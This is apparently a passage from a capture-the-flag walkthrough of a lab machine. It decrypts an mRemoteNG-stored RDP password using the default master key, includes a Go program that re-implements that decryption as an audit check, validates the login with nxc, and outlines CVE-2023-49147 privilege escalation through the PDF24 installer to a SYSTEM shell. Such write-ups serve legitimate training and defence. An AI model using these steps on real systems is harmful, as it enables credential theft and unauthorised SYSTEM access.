<Node Name="RDP/Gale" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="a179606a-a854-48a6-9baa-491d8eb3bddc" Username="Gale.Dekarios" Domain="" Password="TYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDX+hUYwBePQ/2qKx+57IeOROXhJxA7CczQzr1nRm89JulQDWPw==" Hostname="Lock" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
</mrng:Connections>
This is an mRemoteNG configuration file.
It can be decrypted in one step with mremoteng_decrypt.py (mRemoteNG's default master password is mR3m):
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# git clone https://github.com/haseebT/mRemoteNG-Decrypt.git
Cloning into 'mRemoteNG-Decrypt'...
remote: Enumerating objects: 19, done.
remote: Total 19 (delta 0), reused 0 (delta 0), pack-reused 19 (from 1)
Receiving objects: 100% (19/19), 14.80 KiB | 7.40 MiB/s, done.
Resolving deltas: 100% (4/4), done.
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# cd mRemoteNG-Decrypt
┌──(root㉿kali)-[~/Desktop/htb/lock/mRemoteNG-Decrypt]
└─# python3 mremoteng_decrypt.py -s "TYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDX+hUYwBePQ/2qKx+57IeOROXhJxA7CczQzr1nRm89JulQDWPw=="
Password: ty8wnW9qCKDosXo6
┌──(root㉿kali)-[~/Desktop/htb/lock/mRemoteNG-Decrypt]
└─# nxc rdp 10.129.234.64 -u Gale.Dekarios -p ty8wnW9qCKDosXo6
RDP 10.129.234.64 3389 LOCK [*] Windows 10 or Windows Server 2016 Build 20348 (name:LOCK) (domain:Lock) (nla:False)
RDP 10.129.234.64 3389 LOCK [+] Lock\Gale.Dekarios:ty8wnW9qCKDosXo6 (Pwn3d!)
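What mremoteng_decrypt.py does, written out as an added Go example (this is neither that tool nor mRemoteNG's own code): the AES-GCM format the config.xml above uses (EncryptionEngine="AES", BlockCipherMode="GCM") stores each password as base64(salt[16] || nonce[16] || ciphertext || tag[16]); the AES-256 key is PBKDF2-HMAC-SHA1 over the master password and the salt for the file's KdfIterations count, and the salt doubles as the GCM associated data. PBKDF2 is written by hand so that only the standard library is needed. The two blobs are the Password and Protected attributes from the file above; the Protected check is the audit a defender wants, since a file whose Protected value verifies under "mR3m" exposes every password it holds to anyone who can read it.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha1"
	"encoding/base64"
	"errors"
	"fmt"
)

// DefaultMasterPassword is what mRemoteNG uses when the user never set one.
const DefaultMasterPassword = "mR3m"

// Attribute values copied from the config.xml above.
const (
	GaleBlob      = "TYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDX+hUYwBePQ/2qKx+57IeOROXhJxA7CczQzr1nRm89JulQDWPw=="
	ProtectedBlob = "sDkrKn0JrG4oAL4GW8BctmMNAJfcdu/ahPSQn3W5DPC3vPRiNwfo7OH11trVPbhwpy+1FnqfcPQZ3olLRy+DhDFp"
	KdfIterations = 1000 // KdfIterations="1000" in the file
)

// pbkdf2SHA1 is PBKDF2-HMAC-SHA1 (RFC 8018) written out so the example
// needs nothing outside the standard library.
func pbkdf2SHA1(password, salt []byte, iter, keyLen int) []byte {
	var out []byte
	for block := uint32(1); len(out) < keyLen; block++ {
		mac := hmac.New(sha1.New, password)
		mac.Write(salt)
		mac.Write([]byte{byte(block >> 24), byte(block >> 16), byte(block >> 8), byte(block)})
		u := mac.Sum(nil)
		t := append([]byte(nil), u...)
		for i := 1; i < iter; i++ {
			mac.Reset()
			mac.Write(u)
			u = mac.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// DecryptMRemoteNG reverses the layout mRemoteNG's AES-GCM provider writes:
// base64( salt[16] || nonce[16] || ciphertext || tag[16] ), with
// key = PBKDF2-HMAC-SHA1(master, salt, iterations, 32 bytes) and the salt
// as GCM associated data. A wrong master password fails tag verification.
func DecryptMRemoteNG(blob, master string, iterations int) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(blob)
	if err != nil {
		return "", err
	}
	if len(raw) < 48 {
		return "", errors.New("blob too short for salt, nonce and tag")
	}
	salt, nonce, ct := raw[:16], raw[16:32], raw[32:]
	block, err := aes.NewCipher(pbkdf2SHA1([]byte(master), salt, iterations, 32))
	if err != nil {
		return "", err
	}
	gcm, err := cipher.NewGCMWithNonceSize(block, 16) // mRemoteNG uses a 128-bit nonce
	if err != nil {
		return "", err
	}
	plain, err := gcm.Open(nil, nonce, ct, salt)
	if err != nil {
		return "", fmt.Errorf("decrypt failed, wrong master password?: %w", err)
	}
	return string(plain), nil
}

// UsesDefaultMasterPassword is the audit check: the Protected attribute is
// encrypted under the file's master password, so if it verifies under
// "mR3m" every password in the file is readable without any secret.
func UsesDefaultMasterPassword(protectedAttr string, iterations int) bool {
	_, err := DecryptMRemoteNG(protectedAttr, DefaultMasterPassword, iterations)
	return err == nil
}

func main() {
	fmt.Println("file relies on the default master password:",
		UsesDefaultMasterPassword(ProtectedBlob, KdfIterations))
	pw, err := DecryptMRemoteNG(GaleBlob, DefaultMasterPassword, KdfIterations)
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Println("RDP/Gale password:", pw)
}
```

The check against the Protected attribute is the one to run across a fleet of confCons.xml / config.xml files: any file that verifies under the default key should be treated as plaintext credentials at rest, and the fix is a real master password (or not storing RDP passwords in the file at all), not a stricter ACL on the file alone.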
CVE-2023-49147
Right after logging in, the PDF24 Toolbox software is there; this is most likely the intended exploitation point.
Check the version: 11.15.1.
No doubt then, this is the privilege-escalation vector.
Reproduce it by following this reference:
Local Privilege Escalation via MSI installer in PDF24 Creator (geek Software GmbH) - SEC Consult
msiexec.exe /fa C:\_install\pdf24-creator-11.15.1-x64.msi
Then run this command:
SetOpLock.exe "C:\Program Files\PDF24\faxPrnInst.log" r
When the prompt appears, choose the second option.
It will then hang here.
Right-click, choose "Properties", then click this.
IE/Edge cannot be used to open it here.
Then press Ctrl+O and enter cmd.exe.
After the download finishes, opening it gives SYSTEM privileges.